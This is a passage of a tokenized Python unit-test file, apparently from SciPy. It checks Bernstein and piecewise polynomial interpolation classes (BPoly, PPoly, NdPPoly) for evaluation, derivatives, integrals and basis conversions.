[ <NUM_LIT:3> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:4> ] ] <EOL> bp = BPoly ( c , x ) <EOL> xval = <NUM_LIT:0.1> <EOL> s = xval / <NUM_LIT:2> <EOL> assert_allclose ( bp ( xval ) , <NUM_LIT:3> * ( <NUM_LIT:1> - s ) * ( <NUM_LIT:1> - s ) + <NUM_LIT:1> * <NUM_LIT:2> * s * ( <NUM_LIT:1> - s ) + <NUM_LIT:4> * s * s ) <EOL> def test_two_intervals ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> ] <EOL> c = [ [ <NUM_LIT:3> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:2> ] ] <EOL> bp = BPoly ( c , x ) <EOL> assert_allclose ( bp ( <NUM_LIT> ) , <NUM_LIT:3> * <NUM_LIT> * <NUM_LIT> ) <EOL> assert_allclose ( bp ( <NUM_LIT> ) , <NUM_LIT:2> * ( <NUM_LIT> / <NUM_LIT:2> ) ** <NUM_LIT:2> ) <EOL> def test_extrapolate_attr ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:2> ] <EOL> c = [ [ <NUM_LIT:3> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:4> ] ] <EOL> bp = BPoly ( c , x ) <EOL> for extrapolate in ( True , False , None ) : <EOL> bp = BPoly ( c , x , 
extrapolate = extrapolate ) <EOL> bp_d = bp . derivative ( ) <EOL> if extrapolate is False : <EOL> assert_ ( np . isnan ( bp ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) ) . all ( ) ) <EOL> assert_ ( np . isnan ( bp_d ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) ) . all ( ) ) <EOL> else : <EOL> assert_ ( not np . isnan ( bp ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) ) . any ( ) ) <EOL> assert_ ( not np . isnan ( bp_d ( [ - <NUM_LIT:0.1> , <NUM_LIT> ] ) ) . any ( ) ) <EOL> class TestBPolyCalculus ( TestCase ) : <EOL> def test_derivative ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> ] <EOL> c = [ [ <NUM_LIT:3> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:2> ] ] <EOL> bp = BPoly ( c , x ) <EOL> bp_der = bp . derivative ( ) <EOL> assert_allclose ( bp_der ( <NUM_LIT> ) , - <NUM_LIT:6> * ( <NUM_LIT> ) ) <EOL> assert_allclose ( bp_der ( <NUM_LIT> ) , <NUM_LIT> ) <EOL> assert_allclose ( [ bp ( <NUM_LIT> , nu = <NUM_LIT:1> ) , bp ( <NUM_LIT> , nu = <NUM_LIT:2> ) , bp ( <NUM_LIT> , nu = <NUM_LIT:3> ) ] , <EOL> [ - <NUM_LIT:6> * ( <NUM_LIT:1> - <NUM_LIT> ) , <NUM_LIT> , <NUM_LIT:0.> ] ) <EOL> assert_allclose ( [ bp ( <NUM_LIT> , nu = <NUM_LIT:1> ) , bp ( <NUM_LIT> , nu = <NUM_LIT:2> ) , bp ( <NUM_LIT> , nu = <NUM_LIT:3> ) ] , <EOL> [ <NUM_LIT> , <NUM_LIT:1.> , <NUM_LIT:0> ] ) <EOL> def test_derivative_ppoly ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> m , k = <NUM_LIT:5> , <NUM_LIT:8> <EOL> x = np . sort ( np . random . random ( m ) ) <EOL> c = np . random . random ( ( k , m - <NUM_LIT:1> ) ) <EOL> bp = BPoly ( c , x ) <EOL> pp = PPoly . from_bernstein_basis ( bp ) <EOL> for d in range ( k ) : <EOL> bp = bp . derivative ( ) <EOL> pp = pp . derivative ( ) <EOL> xp = np . linspace ( x [ <NUM_LIT:0> ] , x [ - <NUM_LIT:1> ] , <NUM_LIT> ) <EOL> assert_allclose ( bp ( xp ) , pp ( xp ) ) <EOL> def test_deriv_inplace ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> m , k = <NUM_LIT:5> , <NUM_LIT:8> <EOL> x = np . sort ( np . random . 
random ( m ) ) <EOL> c = np . random . random ( ( k , m - <NUM_LIT:1> ) ) <EOL> for cc in [ c . copy ( ) , c * ( <NUM_LIT:1.> + <NUM_LIT> ) ] : <EOL> bp = BPoly ( cc , x ) <EOL> xp = np . linspace ( x [ <NUM_LIT:0> ] , x [ - <NUM_LIT:1> ] , <NUM_LIT> ) <EOL> for i in range ( k ) : <EOL> assert_allclose ( bp ( xp , i ) , bp . derivative ( i ) ( xp ) ) <EOL> def test_antiderivative_simple ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> ] <EOL> c = [ [ <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , <NUM_LIT:1> ] ] <EOL> bp = BPoly ( c , x ) <EOL> bi = bp . antiderivative ( ) <EOL> xx = np . linspace ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:11> ) <EOL> assert_allclose ( bi ( xx ) , <EOL> np . where ( xx < <NUM_LIT:1> , xx ** <NUM_LIT:2> / <NUM_LIT> , <EOL> <NUM_LIT:0.5> * xx * ( xx / <NUM_LIT> - <NUM_LIT:1> ) + <NUM_LIT> / <NUM_LIT:4> ) , <EOL> atol = <NUM_LIT> , rtol = <NUM_LIT> ) <EOL> def test_der_antider ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . random . random ( <NUM_LIT:11> ) ) <EOL> c = np . random . random ( ( <NUM_LIT:4> , <NUM_LIT:10> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> bp = BPoly ( c , x ) <EOL> xx = np . linspace ( x [ <NUM_LIT:0> ] , x [ - <NUM_LIT:1> ] , <NUM_LIT:100> ) <EOL> assert_allclose ( bp . antiderivative ( ) . derivative ( ) ( xx ) , <EOL> bp ( xx ) , atol = <NUM_LIT> , rtol = <NUM_LIT> ) <EOL> def test_antider_ppoly ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . random . random ( <NUM_LIT:11> ) ) <EOL> c = np . random . random ( ( <NUM_LIT:4> , <NUM_LIT:10> , <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> bp = BPoly ( c , x ) <EOL> pp = PPoly . from_bernstein_basis ( bp ) <EOL> xx = np . linspace ( x [ <NUM_LIT:0> ] , x [ - <NUM_LIT:1> ] , <NUM_LIT:10> ) <EOL> assert_allclose ( bp . antiderivative ( <NUM_LIT:2> ) ( xx ) , <EOL> pp . antiderivative ( <NUM_LIT:2> ) ( xx ) , atol = <NUM_LIT> , rtol = <NUM_LIT> ) <EOL> def test_antider_continuous ( self ) : <EOL> np . random . 
seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . random . random ( <NUM_LIT:11> ) ) <EOL> c = np . random . random ( ( <NUM_LIT:4> , <NUM_LIT:10> ) ) <EOL> bp = BPoly ( c , x ) . antiderivative ( ) <EOL> xx = bp . x [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> assert_allclose ( bp ( xx - <NUM_LIT> ) , <EOL> bp ( xx + <NUM_LIT> ) , atol = <NUM_LIT> , rtol = <NUM_LIT> ) <EOL> def test_integrate ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> x = np . sort ( np . random . random ( <NUM_LIT:11> ) ) <EOL> c = np . random . random ( ( <NUM_LIT:4> , <NUM_LIT:10> ) ) <EOL> bp = BPoly ( c , x ) <EOL> pp = PPoly . from_bernstein_basis ( bp ) <EOL> assert_allclose ( bp . integrate ( <NUM_LIT:0> , <NUM_LIT:1> ) , <EOL> pp . integrate ( <NUM_LIT:0> , <NUM_LIT:1> ) , atol = <NUM_LIT> , rtol = <NUM_LIT> ) <EOL> def test_integrate_extrap ( self ) : <EOL> c = [ [ <NUM_LIT:1> ] ] <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> b = BPoly ( c , x ) <EOL> assert_allclose ( b . integrate ( <NUM_LIT:0> , <NUM_LIT:2> ) , <NUM_LIT> , atol = <NUM_LIT> ) <EOL> b1 = BPoly ( c , x , extrapolate = False ) <EOL> assert_ ( np . isnan ( b1 . integrate ( <NUM_LIT:0> , <NUM_LIT:2> ) ) ) <EOL> assert_allclose ( b1 . integrate ( <NUM_LIT:0> , <NUM_LIT:2> , extrapolate = True ) , <NUM_LIT> , atol = <NUM_LIT> ) <EOL> def test_antider_neg ( self ) : <EOL> c = [ [ <NUM_LIT:1> ] ] <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> b = BPoly ( c , x ) <EOL> xx = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT> ) <EOL> assert_allclose ( b . derivative ( - <NUM_LIT:1> ) ( xx ) , b . antiderivative ( ) ( xx ) , <EOL> atol = <NUM_LIT> , rtol = <NUM_LIT> ) <EOL> assert_allclose ( b . derivative ( <NUM_LIT:1> ) ( xx ) , b . 
antiderivative ( - <NUM_LIT:1> ) ( xx ) , <EOL> atol = <NUM_LIT> , rtol = <NUM_LIT> ) <EOL> class TestPolyConversions ( TestCase ) : <EOL> def test_bp_from_pp ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> ] <EOL> c = [ [ <NUM_LIT:3> , <NUM_LIT:2> ] , [ <NUM_LIT:1> , <NUM_LIT:8> ] , [ <NUM_LIT:4> , <NUM_LIT:3> ] ] <EOL> pp = PPoly ( c , x ) <EOL> bp = BPoly . from_power_basis ( pp ) <EOL> pp1 = PPoly . from_bernstein_basis ( bp ) <EOL> xp = [ <NUM_LIT:0.1> , <NUM_LIT> ] <EOL> assert_allclose ( pp ( xp ) , bp ( xp ) ) <EOL> assert_allclose ( pp ( xp ) , pp1 ( xp ) ) <EOL> def test_bp_from_pp_random ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> m , k = <NUM_LIT:5> , <NUM_LIT:8> <EOL> x = np . sort ( np . random . random ( m ) ) <EOL> c = np . random . random ( ( k , m - <NUM_LIT:1> ) ) <EOL> pp = PPoly ( c , x ) <EOL> bp = BPoly . from_power_basis ( pp ) <EOL> pp1 = PPoly . from_bernstein_basis ( bp ) <EOL> xp = np . linspace ( x [ <NUM_LIT:0> ] , x [ - <NUM_LIT:1> ] , <NUM_LIT> ) <EOL> assert_allclose ( pp ( xp ) , bp ( xp ) ) <EOL> assert_allclose ( pp ( xp ) , pp1 ( xp ) ) <EOL> def test_pp_from_bp ( self ) : <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> ] <EOL> c = [ [ <NUM_LIT:3> , <NUM_LIT:3> ] , [ <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:4> , <NUM_LIT:2> ] ] <EOL> bp = BPoly ( c , x ) <EOL> pp = PPoly . from_bernstein_basis ( bp ) <EOL> bp1 = BPoly . from_power_basis ( pp ) <EOL> xp = [ <NUM_LIT:0.1> , <NUM_LIT> ] <EOL> assert_allclose ( bp ( xp ) , pp ( xp ) ) <EOL> assert_allclose ( bp ( xp ) , bp1 ( xp ) ) <EOL> class TestBPolyFromDerivatives ( TestCase ) : <EOL> def test_make_poly_1 ( self ) : <EOL> c1 = BPoly . _construct_from_derivatives ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ) <EOL> assert_allclose ( c1 , [ <NUM_LIT> , <NUM_LIT> ] ) <EOL> def test_make_poly_2 ( self ) : <EOL> c1 = BPoly . 
_construct_from_derivatives ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:1> ] ) <EOL> assert_allclose ( c1 , [ <NUM_LIT:1.> , <NUM_LIT:1.> , <NUM_LIT:1.> ] ) <EOL> c2 = BPoly . _construct_from_derivatives ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:1> ] ) <EOL> assert_allclose ( c2 , [ <NUM_LIT> , <NUM_LIT> / <NUM_LIT:2> , <NUM_LIT:1.> ] ) <EOL> c3 = BPoly . _construct_from_derivatives ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:2> ] , [ <NUM_LIT:1> , <NUM_LIT:3> ] ) <EOL> assert_allclose ( c3 , [ <NUM_LIT> , - <NUM_LIT:0.5> , <NUM_LIT:1.> ] ) <EOL> def test_make_poly_3 ( self ) : <EOL> c1 = BPoly . _construct_from_derivatives ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:4> ] ) <EOL> assert_allclose ( c1 , [ <NUM_LIT:1.> , <NUM_LIT> / <NUM_LIT:3> , <NUM_LIT> / <NUM_LIT:6> , <NUM_LIT> ] ) <EOL> c2 = BPoly . _construct_from_derivatives ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:1> ] , [ <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> assert_allclose ( c2 , [ <NUM_LIT:1.> , <NUM_LIT> / <NUM_LIT:6> , <NUM_LIT> / <NUM_LIT:3> , <NUM_LIT> ] ) <EOL> c3 = BPoly . _construct_from_derivatives ( <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:4> , <NUM_LIT:3> ] ) <EOL> assert_allclose ( c3 , [ <NUM_LIT:1.> , <NUM_LIT> / <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> def test_make_poly_12 ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> ya = np . r_ [ <NUM_LIT:0> , np . random . random ( <NUM_LIT:5> ) ] <EOL> yb = np . r_ [ <NUM_LIT:0> , np . random . random ( <NUM_LIT:5> ) ] <EOL> c = BPoly . _construct_from_derivatives ( <NUM_LIT:0> , <NUM_LIT:1> , ya , yb ) <EOL> pp = BPoly ( c [ : , None ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> for j in range ( <NUM_LIT:6> ) : <EOL> assert_allclose ( [ pp ( <NUM_LIT:0.> ) , pp ( <NUM_LIT:1.> ) ] , [ ya [ j ] , yb [ j ] ] ) <EOL> pp = pp . derivative ( ) <EOL> def test_raise_degree ( self ) : <EOL> np . random . 
seed ( <NUM_LIT> ) <EOL> x = [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> k , d = <NUM_LIT:8> , <NUM_LIT:5> <EOL> c = np . random . random ( ( k , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> bp = BPoly ( c , x ) <EOL> c1 = BPoly . _raise_degree ( c , d ) <EOL> bp1 = BPoly ( c1 , x ) <EOL> xp = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:11> ) <EOL> assert_allclose ( bp ( xp ) , bp1 ( xp ) ) <EOL> def test_xi_yi ( self ) : <EOL> assert_raises ( ValueError , BPoly . from_derivatives , [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:0> ] ) <EOL> def test_coords_order ( self ) : <EOL> xi = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> yi = [ [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ] <EOL> assert_raises ( ValueError , BPoly . from_derivatives , xi , yi ) <EOL> def test_zeros ( self ) : <EOL> xi = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] <EOL> yi = [ [ <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:0> ] ] <EOL> pp = BPoly . from_derivatives ( xi , yi ) <EOL> assert_ ( pp . c . shape == ( <NUM_LIT:4> , <NUM_LIT:3> ) ) <EOL> ppd = pp . derivative ( ) <EOL> for xp in [ <NUM_LIT:0.> , <NUM_LIT:0.1> , <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] : <EOL> assert_allclose ( [ pp ( xp ) , ppd ( xp ) ] , [ <NUM_LIT:0.> , <NUM_LIT:0.> ] ) <EOL> def _make_random_mk ( self , m , k ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> xi = np . asarray ( [ <NUM_LIT:1.> * j ** <NUM_LIT:2> for j in range ( m + <NUM_LIT:1> ) ] ) <EOL> yi = [ np . random . random ( k ) for j in range ( m + <NUM_LIT:1> ) ] <EOL> return xi , yi <EOL> def test_random_12 ( self ) : <EOL> m , k = <NUM_LIT:5> , <NUM_LIT:12> <EOL> xi , yi = self . _make_random_mk ( m , k ) <EOL> pp = BPoly . from_derivatives ( xi , yi ) <EOL> for order in range ( k // <NUM_LIT:2> ) : <EOL> assert_allclose ( pp ( xi ) , [ yy [ order ] for yy in yi ] ) <EOL> pp = pp . 
derivative ( ) <EOL> def test_order_zero ( self ) : <EOL> m , k = <NUM_LIT:5> , <NUM_LIT:12> <EOL> xi , yi = self . _make_random_mk ( m , k ) <EOL> assert_raises ( ValueError , BPoly . from_derivatives , <EOL> ** dict ( xi = xi , yi = yi , orders = <NUM_LIT:0> ) ) <EOL> def test_orders_too_high ( self ) : <EOL> m , k = <NUM_LIT:5> , <NUM_LIT:12> <EOL> xi , yi = self . _make_random_mk ( m , k ) <EOL> pp = BPoly . from_derivatives ( xi , yi , orders = <NUM_LIT:2> * k - <NUM_LIT:1> ) <EOL> assert_raises ( ValueError , BPoly . from_derivatives , <EOL> ** dict ( xi = xi , yi = yi , orders = <NUM_LIT:2> * k ) ) <EOL> def test_orders_global ( self ) : <EOL> m , k = <NUM_LIT:5> , <NUM_LIT:12> <EOL> xi , yi = self . _make_random_mk ( m , k ) <EOL> order = <NUM_LIT:5> <EOL> pp = BPoly . from_derivatives ( xi , yi , orders = order ) <EOL> for j in range ( order // <NUM_LIT:2> + <NUM_LIT:1> ) : <EOL> assert_allclose ( pp ( xi [ <NUM_LIT:1> : - <NUM_LIT:1> ] - <NUM_LIT> ) , pp ( xi [ <NUM_LIT:1> : - <NUM_LIT:1> ] + <NUM_LIT> ) ) <EOL> pp = pp . derivative ( ) <EOL> assert_ ( not np . allclose ( pp ( xi [ <NUM_LIT:1> : - <NUM_LIT:1> ] - <NUM_LIT> ) , pp ( xi [ <NUM_LIT:1> : - <NUM_LIT:1> ] + <NUM_LIT> ) ) ) <EOL> order = <NUM_LIT:6> <EOL> pp = BPoly . from_derivatives ( xi , yi , orders = order ) <EOL> for j in range ( order // <NUM_LIT:2> ) : <EOL> assert_allclose ( pp ( xi [ <NUM_LIT:1> : - <NUM_LIT:1> ] - <NUM_LIT> ) , pp ( xi [ <NUM_LIT:1> : - <NUM_LIT:1> ] + <NUM_LIT> ) ) <EOL> pp = pp . derivative ( ) <EOL> assert_ ( not np . allclose ( pp ( xi [ <NUM_LIT:1> : - <NUM_LIT:1> ] - <NUM_LIT> ) , pp ( xi [ <NUM_LIT:1> : - <NUM_LIT:1> ] + <NUM_LIT> ) ) ) <EOL> def test_orders_local ( self ) : <EOL> m , k = <NUM_LIT:7> , <NUM_LIT:12> <EOL> xi , yi = self . _make_random_mk ( m , k ) <EOL> orders = [ o + <NUM_LIT:1> for o in range ( m ) ] <EOL> for i , x in enumerate ( xi [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) : <EOL> pp = BPoly . 
from_derivatives ( xi , yi , orders = orders ) <EOL> for j in range ( orders [ i ] // <NUM_LIT:2> + <NUM_LIT:1> ) : <EOL> assert_allclose ( pp ( x - <NUM_LIT> ) , pp ( x + <NUM_LIT> ) ) <EOL> pp = pp . derivative ( ) <EOL> assert_ ( not np . allclose ( pp ( x - <NUM_LIT> ) , pp ( x + <NUM_LIT> ) ) ) <EOL> def test_yi_trailing_dims ( self ) : <EOL> m , k = <NUM_LIT:7> , <NUM_LIT:5> <EOL> xi = np . sort ( np . random . random ( m + <NUM_LIT:1> ) ) <EOL> yi = np . random . random ( ( m + <NUM_LIT:1> , k , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> ) ) <EOL> pp = BPoly . from_derivatives ( xi , yi ) <EOL> assert_equal ( pp . c . shape , ( <NUM_LIT:2> * k , m , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> ) ) <EOL> def test_gh_5430 ( self ) : <EOL> orders = np . int32 ( <NUM_LIT:1> ) <EOL> p = BPoly . from_derivatives ( [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ] , orders = orders ) <EOL> assert_almost_equal ( p ( <NUM_LIT:0> ) , <NUM_LIT:0> ) <EOL> orders = np . int64 ( <NUM_LIT:1> ) <EOL> p = BPoly . from_derivatives ( [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ] , orders = orders ) <EOL> assert_almost_equal ( p ( <NUM_LIT:0> ) , <NUM_LIT:0> ) <EOL> orders = <NUM_LIT:1> <EOL> p = BPoly . from_derivatives ( [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ] , orders = orders ) <EOL> assert_almost_equal ( p ( <NUM_LIT:0> ) , <NUM_LIT:0> ) <EOL> orders = <NUM_LIT:1> <EOL> class TestPpform ( TestCase ) : <EOL> def test_shape ( self ) : <EOL> with warnings . catch_warnings ( ) : <EOL> warnings . simplefilter ( "<STR_LIT:ignore>" , DeprecationWarning ) <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:3> , <NUM_LIT:12> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ) <EOL> x = np . sort ( np . random . rand ( <NUM_LIT> ) ) <EOL> p = ppform ( c , x ) <EOL> xp = np . random . rand ( <NUM_LIT:3> , <NUM_LIT:4> ) <EOL> assert_equal ( p ( xp ) . 
shape , ( <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ) ) <EOL> class TestNdPPoly ( object ) : <EOL> def test_simple_1d ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> + <NUM_LIT:1> ) <EOL> xi = np . random . rand ( <NUM_LIT:200> ) <EOL> p = NdPPoly ( c , ( x , ) ) <EOL> v1 = p ( ( xi , ) ) <EOL> v2 = _ppoly_eval_1 ( c [ : , : , None ] , x , xi ) . ravel ( ) <EOL> assert_allclose ( v1 , v2 ) <EOL> def test_simple_2d ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:6> + <NUM_LIT:1> ) <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:7> + <NUM_LIT:1> ) ** <NUM_LIT:2> <EOL> xi = np . random . rand ( <NUM_LIT:200> ) <EOL> yi = np . random . rand ( <NUM_LIT:200> ) <EOL> v1 = np . empty ( [ len ( xi ) , <NUM_LIT:1> ] , dtype = c . dtype ) <EOL> v1 . fill ( np . nan ) <EOL> _ppoly . evaluate_nd ( c . reshape ( <NUM_LIT:4> * <NUM_LIT:5> , <NUM_LIT:6> * <NUM_LIT:7> , <NUM_LIT:1> ) , <EOL> ( x , y ) , <EOL> np . array ( [ <NUM_LIT:4> , <NUM_LIT:5> ] , dtype = np . intc ) , <EOL> np . c_ [ xi , yi ] , <EOL> np . array ( [ <NUM_LIT:0> , <NUM_LIT:0> ] , dtype = np . intc ) , <EOL> <NUM_LIT:1> , <EOL> v1 ) <EOL> v1 = v1 . ravel ( ) <EOL> v2 = _ppoly2d_eval ( c , ( x , y ) , xi , yi ) <EOL> assert_allclose ( v1 , v2 ) <EOL> p = NdPPoly ( c , ( x , y ) ) <EOL> for nu in ( None , ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) , ( <NUM_LIT:2> , <NUM_LIT:3> ) , ( <NUM_LIT:9> , <NUM_LIT:2> ) ) : <EOL> v1 = p ( np . c_ [ xi , yi ] , nu = nu ) <EOL> v2 = _ppoly2d_eval ( c , ( x , y ) , xi , yi , nu = nu ) <EOL> assert_allclose ( v1 , v2 , err_msg = repr ( nu ) ) <EOL> def test_simple_3d ( self ) : <EOL> np . random . 
seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:7> + <NUM_LIT:1> ) <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:8> + <NUM_LIT:1> ) ** <NUM_LIT:2> <EOL> z = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:9> + <NUM_LIT:1> ) ** <NUM_LIT:3> <EOL> xi = np . random . rand ( <NUM_LIT> ) <EOL> yi = np . random . rand ( <NUM_LIT> ) <EOL> zi = np . random . rand ( <NUM_LIT> ) <EOL> p = NdPPoly ( c , ( x , y , z ) ) <EOL> for nu in ( None , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:0> ) , <EOL> ( <NUM_LIT:6> , <NUM_LIT:0> , <NUM_LIT:2> ) ) : <EOL> v1 = p ( ( xi , yi , zi ) , nu = nu ) <EOL> v2 = _ppoly3d_eval ( c , ( x , y , z ) , xi , yi , zi , nu = nu ) <EOL> assert_allclose ( v1 , v2 , err_msg = repr ( nu ) ) <EOL> def test_simple_4d ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:8> + <NUM_LIT:1> ) <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:9> + <NUM_LIT:1> ) ** <NUM_LIT:2> <EOL> z = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:10> + <NUM_LIT:1> ) ** <NUM_LIT:3> <EOL> u = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:11> + <NUM_LIT:1> ) ** <NUM_LIT:4> <EOL> xi = np . random . rand ( <NUM_LIT:20> ) <EOL> yi = np . random . rand ( <NUM_LIT:20> ) <EOL> zi = np . random . rand ( <NUM_LIT:20> ) <EOL> ui = np . random . 
rand ( <NUM_LIT:20> ) <EOL> p = NdPPoly ( c , ( x , y , z , u ) ) <EOL> v1 = p ( ( xi , yi , zi , ui ) ) <EOL> v2 = _ppoly4d_eval ( c , ( x , y , z , u ) , xi , yi , zi , ui ) <EOL> assert_allclose ( v1 , v2 ) <EOL> def test_deriv_1d ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> + <NUM_LIT:1> ) <EOL> p = NdPPoly ( c , ( x , ) ) <EOL> dp = p . derivative ( nu = [ <NUM_LIT:1> ] ) <EOL> p1 = PPoly ( c , x ) <EOL> dp1 = p1 . derivative ( ) <EOL> assert_allclose ( dp . c , dp1 . c ) <EOL> dp = p . antiderivative ( nu = [ <NUM_LIT:2> ] ) <EOL> p1 = PPoly ( c , x ) <EOL> dp1 = p1 . antiderivative ( <NUM_LIT:2> ) <EOL> assert_allclose ( dp . c , dp1 . c ) <EOL> def test_deriv_3d ( self ) : <EOL> np . random . seed ( <NUM_LIT> ) <EOL> c = np . random . rand ( <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> ) <EOL> x = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:7> + <NUM_LIT:1> ) <EOL> y = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:8> + <NUM_LIT:1> ) ** <NUM_LIT:2> <EOL> z = np . linspace ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:9> + <NUM_LIT:1> ) ** <NUM_LIT:3> <EOL> p = NdPPoly ( c , ( x , y , z ) ) <EOL> p1 = PPoly ( c . transpose ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:4> 